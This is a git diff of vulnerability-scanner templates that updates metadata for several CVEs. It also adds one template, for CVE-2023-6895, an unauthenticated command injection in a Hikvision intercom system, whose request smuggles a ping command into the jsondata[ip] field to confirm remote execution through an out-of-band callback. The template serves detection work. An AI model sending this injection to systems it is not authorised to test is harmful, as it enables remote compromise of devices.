+ cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible:*:*:*:*:*:wordpress:*:* epss-score: 0.00199 epss-percentile: 0.56492 - cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible:*:*:*:*:*:wordpress:*:* metadata: - verified: true - max-request: 1 - vendor: wclovers - product: frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible + product: "frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible" framework: wordpress publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace" + verified: true + max-request: 3 + vendor: wclovers tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,wpscan,sqli flow: http(1) && http(2) @@ -67,4 +67,4 @@ http: - 'contains(header, "application/json")' - 'contains(body, "success")' condition: and -# digest: 4a0a00473045022100ac9faa851954e06269fcb6c1d2c78475a2f575683ef8f476b96450a5671b359102205d7f4ea4de3b3c6db211c706adcd4be8f13de39a9098990f182b0f2008efc79a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ef54cd087054515b6ef2f1935d258ecea55b3abf384cd95798b8cd351a5f1fe90220070a59d1e5a3ab49e8fc248e2ddc238e33958d75f7b3cfc5700b5018b8116f82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40651.yaml b/http/cves/2021/CVE-2021-40651.yaml index cac65b9dd7..2fda1838ae 100644 --- a/http/cves/2021/CVE-2021-40651.yaml +++ b/http/cves/2021/CVE-2021-40651.yaml @@ -18,8 +18,8 @@ info: cwe-id: CWE-22 cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:community:*:*:* metadata: - max-request: 1 - shodan-query: title:"openSIS" + shodan-query: "title:\"openSIS\"" + max-request: 2 tags: cve,cve2021,lfi,os4ed,opensis,authenticated http: @@ -42,4 +42,4 @@ http: - 'contains(body_1, "openSIS")' - "status_code == 200" condition: and -# digest: 490a004630440220206394b303ab92ce65590e2c61e6eb5e9914219a5a0651ae69009a3f224109ff02207e729d1c062d3bd2e445a39a036992cc281564407a764e7f7ced5f02879f1034:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100924b4c785059886c8131bde539e1106c1be30952a7fea88bd992cb9cc3e7aca202204c4c3c880b323df6c23378c766e00dd0222716aa49f384cbc8f4c37b7c9ab38f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0776.yaml b/http/cves/2022/CVE-2022-0776.yaml index f5d7062a48..03311a84eb 100644 --- a/http/cves/2022/CVE-2022-0776.yaml +++ b/http/cves/2022/CVE-2022-0776.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0776 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40832 + epss-percentile: 0.40075 cpe: cpe:2.3:a:revealjs:reveal.js:*:*:*:*:*:node.js:*:* metadata: vendor: revealjs @@ -48,4 +48,4 @@ headless: part: extract words: - "true" -# digest: 4a0a00473045022015776ab1f8ee5f7cbd078059bc34167a0b8ca0a11a1bda34723f7ec03d31b6c302210098d1c6a54ecbafb3158390aea2498590fe70df9d78d3266d388274859a641533:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100822f5151d594a59ff99bde533919eb403ddd05ab8d041ea5963a1c88f81d84320221008c8e17c078665f80ff1f6815e2f071996a8d9e4712b43e3bf775f0c2db3e0e12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-26263.yaml b/http/cves/2022/CVE-2022-26263.yaml index 1897d2e5e5..eb357ee240 100644 --- a/http/cves/2022/CVE-2022-26263.yaml +++ b/http/cves/2022/CVE-2022-26263.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-26263 cwe-id: CWE-79 epss-score: 0.00147 - epss-percentile: 0.50638 + epss-percentile: 0.49633 cpe: cpe:2.3:a:yonyou:u8\+:13.0:*:*:*:*:*:*:* metadata: verified: true @@ -43,4 +43,4 @@ headless: - '' internal: true -# digest: 490a0046304402205dc4e3489b8db4f6e587d569813f9eec4372432d2ed1350de8d8bc00c7d01a8d02207363f5db9a634f3a0973e7e364948a39da565ec0b5ea0f3ac1276c0fc7027331:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100edda67cd80bdd516aa4f6241fa72a9e1d6c1e240eb1d40d35ae9c44143ff025902206f496f8d850ad284d589527d8abd90bf13aa0414c007dad56d79ba9c57d33c59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6831.yaml b/http/cves/2023/CVE-2023-6831.yaml index 878750743b..bde88b3ab0 100644 --- a/http/cves/2023/CVE-2023-6831.yaml +++ b/http/cves/2023/CVE-2023-6831.yaml @@ -6,25 +6,26 @@ info: severity: high description: | Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2. - remediation: | - Upgrade Mlflow to version 2.9.2 or later to mitigate the vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-6831 - https://github.com/mlflow/mlflow/commit/1da75dfcecd4d169e34809ade55748384e8af6c1 - https://huntr.com/bounties/0acdd745-0167-4912-9d5c-02035fe5b314 + remediation: | + Upgrade Mlflow to version 2.9.2 or later to mitigate the vulnerability. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H cvss-score: 8.1 cve-id: CVE-2023-6831 cwe-id: CWE-22 - epss-score: 0.000460000 - epss-percentile: 0.126930000 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* + epss-score: 0.00046 + epss-percentile: 0.12693 metadata: - verified: true vendor: lfprojects product: mlflow - shodan-query: http.title:"mlflow" + shodan-query: "http.title:\"mlflow\"" + max-request: 2 + verified: true tags: cve,cve2023,mlflow,pathtraversal,lfprojects http: @@ -58,4 +59,4 @@ http: - type: status status: - 500 -# digest: 490a0046304402202e05b1ca433f0cc3ad8178fa3db634d613c180a5d76bd1907daf5a29b102f02f0220546c974febbb5121e3697cfc1e76620c450e31cee055c94cd0b25375648e38ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022032f829866528954cdb8ce1c5298787430b08b1d4550ab556b77f078e362da3e102207691a8b5b4639a9faf128176e590b98fc0841775bb6df00b97a7253772fe498a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6895.yaml b/http/cves/2023/CVE-2023-6895.yaml new file mode 100644 index 0000000000..b1fdac14f0 --- /dev/null +++ b/http/cves/2023/CVE-2023-6895.yaml @@ -0,0 +1,56 @@ +id: CVE-2023-6895 + +info: + name: Hikvision Intercom Broadcasting System - Command Execution + author: archer + severity: critical + description: | + Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE (HIK) version has an operating system command injection vulnerability. The vulnerability originates from the parameter jsondata[ip] in the file /php/ping.php, which can cause operating system command injection. + reference: + - https://github.com/FuBoLuSec/CVE-2023-6895/blob/main/CVE-2023-6895.py + - https://vuldb.com/?ctiid.248254 + - https://vuldb.com/?id.248254 + - https://github.com/Marco-zcl/POC + - https://github.com/d4n-sec/d4n-sec.github.io + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-6895 + cwe-id: CWE-78 + epss-score: 0.0008 + epss-percentile: 0.32716 + cpe: cpe:2.3:o:hikvision:intercom_broadcast_system:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: hikvision + product: intercom_broadcast_system + fofa-query: icon_hash="-1830859634" + tags: cve,cve2023,rce,hikvision + +http: + - raw: + - | + POST /php/ping.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + X-Requested-With: XMLHttpRequest + + jsondata%5Btype%5D=99&jsondata%5Bip%5D=ping%20{{interactsh-url}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: word + part: body + words: + - "TTL=" + + - type: status + status: + - 200 +# digest: 490a00463044022046e9673fbb222a36f6113e7f32e176bc2d800d2a0f8fb0824bc84dd30705c4fa022051992f8ba2020e9c09b574c69ecbca8b48a5d98fda9f790dd46ba0313ebb08bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6909.yaml b/http/cves/2023/CVE-2023-6909.yaml index 577dcf9783..8b4b4a2736 100644 --- a/http/cves/2023/CVE-2023-6909.yaml +++ b/http/cves/2023/CVE-2023-6909.yaml @@ -6,24 +6,25 @@ info: severity: critical description: | Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2. - impact: | - Successful exploitation could be lead to disclose of sensitive information such as SSH Keys or Internal configurations. - remediation: | - To fix this vulnerability, it is important to update the mlflow package to the latest version 2.10.0. reference: - https://huntr.com/bounties/11209efb-0f84-482f-add0-587ea6b7e850/ - https://nvd.nist.gov/vuln/detail/CVE-2023-6909 - https://github.com/mlflow/mlflow/commit/1da75dfcecd4d169e34809ade55748384e8af6c1 + impact: | + Successful exploitation could be lead to disclose of sensitive information such as SSH Keys or Internal configurations. + remediation: | + To fix this vulnerability, it is important to update the mlflow package to the latest version 2.10.0. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cve-id: CVE-2023-6909 cwe-id: CWE-29 metadata: + max-request: 5 verified: true vendor: lfprojects product: mlflow - shodan-query: http.title:"mlflow" + shodan-query: "http.title:\"mlflow\"" tags: cve,cve2023,mlflow,lfi http: @@ -90,4 +91,4 @@ http: json: - '.run.info.run_id' internal: true -# digest: 4a0a00473045022057cab29fe3d00006c6db44ac420a34cecdad60ef71ae6159d9d1870d61d97420022100cd6d7114a977b54c1190e1a9a7002626d05b41874dccf1e9e5d38cacc7082c6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dc4c33652fcf1a1d0dc29690ac81838de82d0c439cc405cb3b0296d4e10cb855022100b3a49f754395ee217ea12cc561be556cc6c3a8da3facee851d5f37fdbab72d61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0713.yaml b/http/cves/2024/CVE-2024-0713.yaml index 74459c114b..d52bd7843a 100644 --- a/http/cves/2024/CVE-2024-0713.yaml +++ b/http/cves/2024/CVE-2024-0713.yaml @@ -15,14 +15,15 @@ info: cvss-score: 8.8 cve-id: CVE-2024-0713 cwe-id: CWE-434 + cpe: cpe:2.3:a:monitorr:monitorr:1.7.6m:*:*:*:*:*:*:* epss-score: 0.00061 epss-percentile: 0.2356 - cpe: cpe:2.3:a:monitorr:monitorr:1.7.6m:*:*:*:*:*:*:* metadata: vendor: monitorr product: monitorr verified: true - fofa-query: icon_hash="-211006074" + fofa-query: "icon_hash=\"-211006074\"" + max-request: 2 tags: cve,cve2024,file-upload,intrusive,monitorr variables: @@ -66,4 +67,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200e99cf7ecbba3a0c88653fc454cb5715d7085e0678ab470e4b7cfbf4dd198e8d022100e47a621b93eaabb8881e48cae80b9cc8c0596a437fc9b8ac0921a63beee74506:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201b9bb4536c3d56e915516c2b0156629ce6f3689a312eddd8d0694b86aa144e1902203d8dccbcbba044b30e6fff72ceb7f66bf40a9bf6f3130c3f3b11b0ec3c30a863:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1021.yaml b/http/cves/2024/CVE-2024-1021.yaml index 6276be41a5..bdda7021da 100644 --- a/http/cves/2024/CVE-2024-1021.yaml +++ b/http/cves/2024/CVE-2024-1021.yaml @@ -6,17 +6,17 @@ info: severity: medium description: | There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component. + reference: + - https://github.com/getrebuild/rebuild + - https://nvd.nist.gov/vuln/detail/CVE-2024-1021 impact: | Successful exploitation of this vulnerability can result in unauthorized access to sensitive internal resources. remediation: | Apply the latest security patches or updates provided by Rebuild to fix this vulnerability. - reference: - - https://github.com/getrebuild/rebuild - - https://nvd.nist.gov/vuln/detail/CVE-2024-1021 metadata: - max-request: 1 + max-request: 2 verified: true - fofa-query: icon_hash="871154672" + fofa-query: "icon_hash=\"871154672\"" tags: cve2024,cve,rebuild,ssrf http: @@ -32,4 +32,4 @@ http: - '!contains(body_1, "